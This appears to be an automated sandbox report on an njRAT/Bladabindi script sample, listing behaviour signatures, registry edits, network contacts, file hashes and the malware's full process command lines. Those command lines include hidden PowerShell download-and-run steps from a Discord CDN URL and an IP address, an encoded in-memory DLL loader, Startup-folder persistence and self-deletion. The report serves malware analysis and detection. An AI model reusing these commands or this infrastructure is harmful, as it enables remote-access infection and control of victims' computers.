Analysis Overview
SHA256
ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
Threat Level: Known bad
The file e4fbe2c0de215885d004f354f1e57357 was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Drops startup file
Deletes itself
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-22 18:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-22 18:00
Reported
2022-09-22 18:03
Platform
win7-20220901-en
Max time kernel
107s
Max time network
49s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico | C:\Windows\explorer.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe2300001000d09ad3fd8f23af46adb46c85480369c700000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-22 18:00
Reported
2022-09-22 18:03
Platform
win10v2004-20220812-en
Max time kernel
104s
Max time network
151s
Command Line
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1224 set thread context of 1344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| RU | 5.42.199.120:80 | 5.42.199.120 | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | wins2109ok.duckdns.org | udp |
| US | 173.225.115.227:8000 | wins2109ok.duckdns.org | tcp |
| US | 173.225.115.227:8000 | wins2109ok.duckdns.org | tcp |
Files
C:\Windows\Temp\nLeNPdi.vbs
| MD5 | a0fa641e1fe743aa44d0b42c25243143 |
| SHA1 | 5db55be1cbe8e19f55671e18ca2741e9a5d61c48 |
| SHA256 | 3e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041 |
| SHA512 | e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4aaea8e990963328115bd59dee2bcda8 |
| SHA1 | 2d7eed0a0a898811d6a149a4545ab3732477c01a |
| SHA256 | d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc |
| SHA512 | de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50 |